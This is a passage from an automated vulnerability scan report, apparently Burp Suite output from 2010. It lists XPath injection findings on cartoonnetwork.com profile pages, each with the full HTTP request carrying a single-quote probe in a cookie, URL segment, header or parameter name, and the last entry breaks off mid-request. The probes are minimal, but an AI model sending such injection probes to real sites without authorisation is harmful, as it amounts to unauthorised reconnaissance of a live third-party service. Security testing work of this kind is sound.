Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true'; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:56 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:45 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.125. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The s_sq cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_sq cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA'; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:59 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:45 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.126. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [s_vi cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Hector/Warrior/index.html

Issue detail

The s_vi cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_vi cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Hector/Warrior/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]'; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:58 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:46 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.127. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [1401316autoFreqCap cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The 1401316autoFreqCap cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the 1401316autoFreqCap cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0'; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:00 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:50 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.128. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The JSESSIONID cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the JSESSIONID cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290'; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:54 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:46 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.129. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles'/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:03 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.130. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active'/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:06 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.131. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie'/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:08 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.132. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast'/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:11 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.133. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:13 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.134. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:03 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:48 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.135. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:02 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:46 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.136. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [adDEmas cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The adDEmas cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEmas cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&';

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:01 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:50 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.137. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [adDEon cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The adDEon cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEon cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true'; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:00 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:47 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.138. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html?1'=1 HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:02 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:47 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.139. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [route cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The route cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the route cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3'; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:57 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:46 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.140. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The s_cc cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_cc cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
